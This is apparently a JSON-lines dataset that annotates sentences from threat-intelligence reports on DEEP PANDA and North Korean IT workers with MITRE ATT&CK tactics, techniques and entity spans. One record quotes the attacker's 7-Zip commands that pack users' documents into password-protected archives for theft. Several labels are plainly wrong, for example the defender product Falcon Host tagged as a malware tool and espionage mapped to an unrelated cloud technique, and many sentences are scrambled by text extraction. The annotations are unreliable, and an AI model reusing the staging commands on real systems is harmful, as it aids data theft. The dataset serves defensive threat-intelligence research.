"uid": "mitre-78_mitre_report-p1-s56-5a2d9f", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "After using compromised credentials to mount file shares, the adversary was seen compressing data using 7-zip.", "sentence_text": "They were adding different document types to compressed files by wildcarding the extensions, such as:\n“C:Program Files7-Zip7z” a setup1.log -r -pkkk*** “\\users*rtf *doc” “C:Program Files7-Zip7z” a setup1.log -r -pkkk*** “\\users*ppt” They knew exactly which users to target based on their research policy area, and they rapidly pivoted from China/Asia Pacific policy experts to Iraq/Middle East policy experts once their tasking collection requirements changed.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1560", "name": "Archive Collected Data" } ], "procedure": "Added specific document types to compressed archives and pivoted targeting based on policy expertise", "entities": [ { "text": "7-Zip", "start": 118, "end": 123, "label": "MalwareTool" }, { "text": "rtf ", "start": 182, "end": 186, "label": "Infrastructure_Indicator" }, { "text": "*doc", "start": 186, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "*ppt", "start": 271, "end": 275, "label": "Infrastructure_Indicator" }, { "text": "\\users", "start": 153, "end": 181, "label": "Infrastructure_Indicator" }, { "text": "adding ", "start": 10, "end": 17, "label": "Action" }, { "text": "pivoted ", "start": 371, "end": 379, "label": "Action" }, { "text": "target ", "start": 310, "end": 317, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s57-65b2fc", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "They were adding different document types to compressed files by wildcarding the extensions, such as:\n“C:Program Files7-Zip7z” a setup1.log -r -pkkk*** “\\users*rtf *doc” “C:Program Files7-Zip7z” a setup1.log -r -pkkk*** “\\users*ppt” They knew exactly which users to target based on their research policy area, and they rapidly pivoted from China/Asia Pacific policy experts to Iraq/Middle East policy experts once their tasking collection requirements changed.", "sentence_text": "Aggressive Use of Ping to Determine Which Machines of Interest are Online On one of the compromised machines, the adversary brought in a command-line version of RAR archiver that was named “cftmon.exe” and placed it into “c:windowstemphotfix” directory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Placed renamed RAR archiver in temp directory", "entities": [ { "text": "cftmon.exe", "start": 190, "end": 200, "label": "MalwareTool" }, { "text": " RAR archiver", "start": 160, "end": 173, "label": "MalwareTool" }, { "text": "c:windowstemphotfix", "start": 222, "end": 241, "label": "Infrastructure_Indicator" }, { "text": "placed ", "start": 206, "end": 213, "label": "Action" }, { "text": " brought in", "start": 123, "end": 134, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s58-4de2cf", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "Aggressive Use of Ping to Determine Which Machines of Interest are Online On one of the compromised machines, the adversary brought in a command-line version of RAR archiver that was named “cftmon.exe” and placed it into “c:windowstemphotfix” directory.", "sentence_text": "The files were encrypted (both file data and headers) with “uinfw” password and the archive files were named after the initials of each user that had been targeted and stored in the same “c:windowstemphotfix” directory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1560.001", "name": "Archive via Utility" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Encrypted archives with password and stored them in temp directory", "entities": [ { "text": "“uinfw” password", "start": 59, "end": 75, "label": "Infrastructure_Indicator" }, { "text": " “c:windowstemphotfix” directory", "start": 186, "end": 218, "label": "Infrastructure_Indicator" }, { "text": "c:windowstemphotfix", "start": 188, "end": 207, "label": "Infrastructure_Indicator" }, { "text": "uinfw", "start": 60, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "encrypted ", "start": 15, "end": 25, "label": "Action" }, { "text": "stored ", "start": 168, "end": 175, "label": "Action" }, { "text": " archive files were named after the initials", "start": 83, "end": 127, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-78_mitre_report-p1-s59-242418", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "The files were encrypted (both file data and headers) with “uinfw” password and the archive files were named after the initials of each user that had been targeted and stored in the same “c:windowstemphotfix” directory.", "sentence_text": "For lateral movement, they used WMI to deploy the powershell scripts remotely and setup scheduled tasks on the remote systems.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" }, { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "Used WMI to deploy PowerShell scripts and setup scheduled tasks for lateral movement", "entities": [ { "text": "powershell scripts", "start": 50, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "remote systems", "start": 111, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "setup ", "start": 82, "end": 88, "label": "Action" }, { "text": "deploy ", "start": 39, "end": 46, "label": "Action" }, { "text": "used ", "start": 27, "end": 32, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s60-befcbc", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "For lateral movement, they used WMI to deploy the powershell scripts remotely and setup scheduled tasks on the remote systems.", "sentence_text": "Despite the fact that we were seeing nearly identical TTPs used across multiple think-tank targets, there is evidence to indicate that these operations had different individuals behind the keyboard based on the intricacies of how certain powershell command lines had been used in each case.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s61-86a1a7", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "Despite the fact that we were seeing nearly identical TTPs used across multiple think-tank targets, there is evidence to indicate that these operations had different individuals behind the keyboard based on the intricacies of how certain powershell command lines had been used in each case.", "sentence_text": "Due to their stellar operational security and reliance on anti-forensic and anti-IOC detection techniques, detecting and stopping them is very challenging without the use of next-generation endpoint technology like Falcon Host.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Relies on anti-forensic and anti-IOC detection techniques", "entities": [ { "text": " Falcon Host", "start": 214, "end": 226, "label": "MalwareTool" }, { "text": "reliance ", "start": 46, "end": 55, "label": "Action" } ] }, { "uid": "mitre-78_mitre_report-p1-s62-8f9b86", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "Due to their stellar operational security and reliance on anti-forensic and anti-IOC detection techniques, detecting and stopping them is very challenging without the use of next-generation endpoint technology like Falcon Host.", "sentence_text": "Not only was Falcon Host able to detect this adversary without relying on static signatures or IOCs, but it was able to provide instantaneous and full forensic analysis of what had occurred on each of the compromised endpoints without the need to pull hard drives and do costly and time-intensive forensics, substantially reducing the time needed for remediation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s63-398e71", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "Not only was Falcon Host able to detect this adversary without relying on static signatures or IOCs, but it was able to provide instantaneous and full forensic analysis of what had occurred on each of the compromised endpoints without the need to pull hard drives and do costly and time-intensive forensics, substantially reducing the time needed for remediation.", "sentence_text": "If you are a non-profit think tank or a human rights organization that would like to take advantage of our no-charge offer of Falcon Host licenses for your servers and desktops, please email us at sales@crowdstrike.com with the subject “Non-Profit Falcon Host Offer.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s64-35c3f7", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "If you are a non-profit think tank or a human rights organization that would like to take advantage of our no-charge offer of Falcon Host licenses for your servers and desktops, please email us at sales@crowdstrike.com with the subject “Non-Profit Falcon Host Offer.”", "sentence_text": "And our has worked on multiple intrusion investigations related to DEEP PANDA in the last year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s65-48d59f", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "And our has worked on multiple intrusion investigations related to DEEP PANDA in the last year.", "sentence_text": "If you would also like to see a demo of Falcon Host or Falcon Intelligence in action or discuss our Services offerings, please contact our Sales Team to schedule a personal briefing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-78_mitre_report-p1-s66-028ee7", "source": "mitre", "doc_id": "78_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "If you would also like to see a demo of Falcon Host or Falcon Intelligence in action or discuss our Services offerings, please contact our Sales Team to schedule a personal briefing.", "sentence_text": "Tweet\nShare\nDmitri Alperovitch\nDmitri Alperovitch is a Co-founder of CrowdStrike who left the company in February 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p1-s1-f51742", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "WORKFORCE\nIT\nHIDDEN\nAND\nSYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p2-s4-4db5f8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 2, "sentence_id": 4, "context_before": "Org Chart.....................................................8 Unconventional Attribution Methods for an Unconventional Program...................................9", "sentence_text": "Rethinking the DPRK: Correcting Misconceptions..............................................................10 Mapping the DPRK’s Cyber Strategy....................................................................................11 AI...............................................................................................................................21 Research Center 227.................................................................................................22 Cryptocurrency.........................................................................................................24 Destruction...............................................................................................................27 Espionage.................................................................................................................28 Surveillance..............................................................................................................30 IT Workers.................................................................................................................31 2 In Focus: IT Workers...........................................................................................................35 Overarching Units and Colleges..........................................................................................41 WORKFORCE The Way IT Forward................................................................................................................46 HIDDEN Conclusion..........................................................................................................................47 AND Sources..............................................................................................................................50 SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p3-s5-8583e0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 3, "sentence_id": 5, "context_before": "Rethinking the DPRK: Correcting Misconceptions..............................................................10 Mapping the DPRK’s Cyber Strategy....................................................................................11 AI...............................................................................................................................21 Research Center 227.................................................................................................22 Cryptocurrency.........................................................................................................24 Destruction...............................................................................................................27 Espionage.................................................................................................................28 Surveillance..............................................................................................................30 IT Workers.................................................................................................................31 2 In Focus: IT Workers...........................................................................................................35 Overarching Units and Colleges..........................................................................................41 WORKFORCE The Way IT Forward................................................................................................................46 HIDDEN Conclusion..........................................................................................................................47 AND Sources..............................................................................................................................50 SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "“Every business leader and security professional needs to recognize the risks of accommodating remote workers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p3-s6-33bd6d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 3, "sentence_id": 6, "context_before": "“Every business leader and security professional needs to recognize the risks of accommodating remote workers.", "sentence_text": "Remote work is a shift change that accelerated massively during the COVID pandemic in 2020, and became the new normal overnight.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p3-s7-51dba6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 3, "sentence_id": 7, "context_before": "Remote work is a shift change that accelerated massively during the COVID pandemic in 2020, and became the new normal overnight.", "sentence_text": "To empower companies to trust their remote resources is paramount—especially with North Korea leveraging the opportunity to fund its weapons program.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p3-s8-da6636", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 3, "sentence_id": 8, "context_before": "To empower companies to trust their remote resources is paramount—especially with North Korea leveraging the opportunity to fund its weapons program.", "sentence_text": "The threat of unintentionally hiring North Korean IT workers is larger than most people realize.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Using North Korean IT workers to generate revenue", "entities": [ { "text": "hiring ", "start": 30, "end": 37, "label": "Action" }, { "text": "North Korean IT workers", "start": 37, "end": 60, "label": "ThreatActor" } ] }, { "uid": "mitre-79_mitre_report-p3-s9-335ef1", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 3, "sentence_id": 9, "context_before": "The threat of unintentionally hiring North Korean IT workers is larger than most people realize.", "sentence_text": "Recognizing it as a family-run mafia syndicate unblurs thelines between cybercrime and statecraft.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p3-s10-710cb8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 3, "sentence_id": 10, "context_before": "Recognizing it as a family-run mafia syndicate unblurs thelines between cybercrime and statecraft.", "sentence_text": "This report pulls back the WORKFORCE curtain on their inner workings and psychology, revealing how deeply IT embedded they already are within our workforce—providing the HIDDEN ANDcontext needed to anticipate their next move.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p3-s11-8508e5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 3, "sentence_id": 11, "context_before": "This report pulls back the WORKFORCE curtain on their inner workings and psychology, revealing how deeply IT embedded they already are within our workforce—providing the HIDDEN ANDcontext needed to anticipate their next move.”", "sentence_text": "EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p4-s12-68ea17", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 12, "context_before": "EXPOSING", "sentence_text": "Executive Summary\nUnmasking the DPRK’s Nation-State Crime Syndicate:\nTime to Rethink the Threat The Democratic People’s Republic of Korea (DPRK) has emerged as a far more sophisticated and dangerous cyber actor than widely recognized.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p4-s13-588f18", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 13, "context_before": "Executive Summary\nUnmasking the DPRK’s Nation-State Crime Syndicate:\nTime to Rethink the Threat The Democratic People’s Republic of Korea (DPRK) has emerged as a far more sophisticated and dangerous cyber actor than widely recognized.", "sentence_text": "was it done, and how was it enabled?”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p4-s14-e7fdde", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 14, "context_before": "was it done, and how was it enabled?”", "sentence_text": "It is not about state-sanctioned crime syndicate than a conventional military or discarding past attribution intelligence apparatus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p4-s15-3daf97", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 15, "context_before": "It is not about state-sanctioned crime syndicate than a conventional military or discarding past attribution intelligence apparatus.", "sentence_text": "Simultaneously, parallel threat where it is today.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p4-s16-9758a9", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 16, "context_before": "Simultaneously, parallel threat where it is today.", "sentence_text": "operations engage in state espionage, accelerating nuclear and military programs through stolen intelligence.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1651", "name": "Cloud Administration Command" } ], "procedure": "Engages in state espionage to accelerate nuclear and military programs", "entities": [ { "text": "nuclear and military programs", "start": 51, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "stolen ", "start": 89, "end": 96, "label": "Action" }, { "text": "engage ", "start": 11, "end": 18, "label": "Action" }, { "text": "accelerating ", "start": 38, "end": 51, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p4-s17-050499", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 17, "context_before": "operations engage in state espionage, accelerating nuclear and military programs through stolen intelligence.", "sentence_text": "WORKFORCE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p4-s18-711303", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 18, "context_before": "WORKFORCE", "sentence_text": "But what sets the DPRK apart is the survival-based incentive structure at IT the heart of its engine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p4-s19-03249b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 19, "context_before": "But what sets the DPRK apart is the survival-based incentive structure at IT the heart of its engine.", "sentence_text": "In a country defined by scarcity, participation in cyber operations SYNDICATE offers a rare path to a better life.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p4-s20-fbbdeb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 4, "sentence_id": 20, "context_before": "In a country defined by scarcity, participation in cyber operations SYNDICATE offers a rare path to a better life.", "sentence_text": "Loyalty is not the core driver.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p5-s23-b8420e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 23, "context_before": "EXPOSING", "sentence_text": "Why Now?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p5-s24-b9476d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 24, "context_before": "Why Now?", "sentence_text": "The urgency of this report stems from a sobering reality: critical This is not a infrastructure and global supply chains are already compromised.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1529", "name": "System Shutdown/Reboot" }, { "id": "T1531", "name": "Account Access Removal" } ], "procedure": "Compromised critical infrastructure and global supply chains", "entities": [ { "text": "compromised", "start": 133, "end": 144, "label": "Action" }, { "text": "global supply chains", "start": 100, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p5-s25-3aed9c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 25, "context_before": "The urgency of this report stems from a sobering reality: critical This is not a infrastructure and global supply chains are already compromised.", "sentence_text": "DPRK operatives are not just knocking on the door—they’re inside the house.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p5-s26-a9c3de", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 26, "context_before": "DPRK operatives are not just knocking on the door—they’re inside the house.", "sentence_text": "in real time, at What powers it is one of the world’s most disciplined and covert cyber alarming speed talent pipelines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p5-s27-d7aeb5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 27, "context_before": "in real time, at What powers it is one of the world’s most disciplined and covert cyber alarming speed talent pipelines.", "sentence_text": "executing missions with precision—advancing state objectives while securing resources and status for themselves and their families.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Executes missions to advance state objectives and secure resources", "entities": [ { "text": "executing missions", "start": 0, "end": 18, "label": "Action" }, { "text": "advancing state objectives", "start": 34, "end": 60, "label": "Action" }, { "text": "securing resources", "start": 67, "end": 85, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p5-s28-76d32a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 28, "context_before": "executing missions with precision—advancing state objectives while securing resources and status for themselves and their families.", "sentence_text": "Now amplified by AI, this talent engine is accelerating the threat beyond anything conventional defenses were designed to handle.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p5-s29-2e76a6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 29, "context_before": "Now amplified by AI, this talent engine is accelerating the threat beyond anything conventional defenses were designed to handle.", "sentence_text": "The rise of Research Center 227—North Korea’s AI-driven cyber division— marks a decisive evolution.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Established AI-driven cyber division (Research Center 227)", "entities": [ { "text": "North Korea", "start": 32, "end": 43, "label": "ThreatActor" }, { "text": "Research Center 227", "start": 12, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-79_mitre_report-p5-s30-7dfe18", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 30, "context_before": "The rise of Research Center 227—North Korea’s AI-driven cyber division— marks a decisive evolution.", "sentence_text": "Combining human expertise with machine learning, DPRK is now capable of high-velocity operations that dissolve the line between cyber disruption and physical sabotage.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565", "name": "Data Manipulation" } ], "procedure": "Combines human expertise with machine learning for high-velocity cyber-physical operations", "entities": [ { "text": "DPRK ", "start": 49, "end": 54, "label": "ThreatActor" }, { "text": "dissolve ", "start": 102, "end": 111, "label": "Action" }, { "text": "Combining ", "start": 0, "end": 10, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p5-s31-68e214", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 31, "context_before": "Combining human expertise with machine learning, DPRK is now capable of high-velocity operations that dissolve the line between cyber disruption and physical sabotage.", "sentence_text": "From deepfake propaganda to AI-powered suicide drones, the spectrum of threats has 5 widened dramatically.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1588.006", "name": "Vulnerabilities" }, { "id": "T1565.003", "name": "Runtime Data Manipulation" } ], "procedure": "Uses deepfake propaganda and AI-powered suicide drones", "entities": [ { "text": "deepfake propaganda", "start": 5, "end": 24, "label": "MalwareTool" }, { "text": "AI-powered suicide drones", "start": 28, "end": 53, "label": "MalwareTool" } ] }, { "uid": "mitre-79_mitre_report-p5-s32-ea8754", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 32, "context_before": "From deepfake propaganda to AI-powered suicide drones, the spectrum of threats has 5 widened dramatically.", "sentence_text": "It’s a physical threat with frightening IT national security consequences.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p5-s33-1b4ecd", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 33, "context_before": "It’s a physical threat with frightening IT national security consequences.", "sentence_text": "And it’s being bankrolled by the DPRK’s HIDDENfinancially motivated cybercrime operations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Funds operations through financially motivated cybercrime", "entities": [ { "text": "DPRK", "start": 33, "end": 37, "label": "ThreatActor" }, { "text": "bankrolled ", "start": 15, "end": 26, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p5-s34-a4fe33", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 34, "context_before": "And it’s being bankrolled by the DPRK’s HIDDENfinancially motivated cybercrime operations.", "sentence_text": "AND\nLeaders across the enterprise and government—not just CISOs—must act now to identify and eliminate embedded operatives from their networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p5-s36-58bd81", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 5, "sentence_id": 36, "context_before": "SYNDICATE", "sentence_text": "This report is an urgent call for action, requiring a shift from attribution to CYBER full-spectrum threat awareness.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s38-3e6ac3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 38, "context_before": "EXPOSING", "sentence_text": "About This Report", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s39-bcfc1a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 39, "context_before": "About This Report", "sentence_text": "This report is the result of a collaborative effort involving numerous intelligence experts and analysts, who have contributed their insights and research to paint a comprehensive picture of the DPRK’s cyber-physical capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s40-c19b1e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 40, "context_before": "This report is the result of a collaborative effort involving numerous intelligence experts and analysts, who have contributed their insights and research to paint a comprehensive picture of the DPRK’s cyber-physical capabilities.", "sentence_text": "DTEX Systems is proud to be the vehicle for information sharing in this important awareness campaign, and grateful for the opportunity to contribute its own investigative findings to the broader community.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s41-ded1e6", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 41, "context_before": "DTEX Systems is proud to be the vehicle for information sharing in this important awareness campaign, and grateful for the opportunity to contribute its own investigative findings to the broader community.", "sentence_text": "The goal of this report is to foster greater collaboration and knowledge exchange among those tracking and combating the DPRK threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s42-a93841", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 42, "context_before": "The goal of this report is to foster greater collaboration and knowledge exchange among those tracking and combating the DPRK threat.", "sentence_text": "By bringing together trusted perspectives, we hope to better equip organizations worldwide to proactively defend against the growing and multifaceted threat posed by DPRK operatives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s43-db3e30", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 43, "context_before": "By bringing together trusted perspectives, we hope to better equip organizations worldwide to proactively defend against the growing and multifaceted threat posed by DPRK operatives.", "sentence_text": "References to “we” should be understood in that collaborative context.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s44-7ae511", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 44, "context_before": "References to “we” should be understood in that collaborative context.", "sentence_text": "It’s structured to help connect the dots: from the DPRK’s strategic objectives and cyber talent 6 pipeline to the operational tactics and human motivations behind its campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s45-bf8355", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 45, "context_before": "It’s structured to help connect the dots: from the DPRK’s strategic objectives and cyber talent 6 pipeline to the operational tactics and human motivations behind its campaigns.", "sentence_text": "Readers are encouraged to move through it with both a strategic lens and a sense of urgency—this is not just about cyber incidents, but about a system designed to exploit trust, infrastructure, andglobal norms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s46-dee59e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 46, "context_before": "Readers are encouraged to move through it with both a strategic lens and a sense of urgency—this is not just about cyber incidents, but about a system designed to exploit trust, infrastructure, andglobal norms.", "sentence_text": "WORKFORCE IT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p6-s47-cf0cb0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 6, "sentence_id": 47, "context_before": "WORKFORCE IT", "sentence_text": "SYNDICATE CYBER DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s48-05acca", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 48, "context_before": "SYNDICATE CYBER DPRK’S EXPOSING", "sentence_text": "Our collective now has decades of Michael “Barni” Barnhart experience focused squarely on this threat, with new personnel joining us Lead Author consistently to join this fight for the greater good.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s49-a0ffc1", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 49, "context_before": "Our collective now has decades of Michael “Barni” Barnhart experience focused squarely on this threat, with new personnel joining us Lead Author consistently to join this fight for the greater good.", "sentence_text": "I also relied on datasets and organic open-source collections obtained through trusted partners— sources that cannot be fully disclosed due to the sensitivity of access or reluctance to be named.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s50-dad0e5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 50, "context_before": "I also relied on datasets and organic open-source collections obtained through trusted partners— sources that cannot be fully disclosed due to the sensitivity of access or reluctance to be named.", "sentence_text": "This investigation was not a solo effort.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s51-560789", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 51, "context_before": "This investigation was not a solo effort.", "sentence_text": "Special thanks to 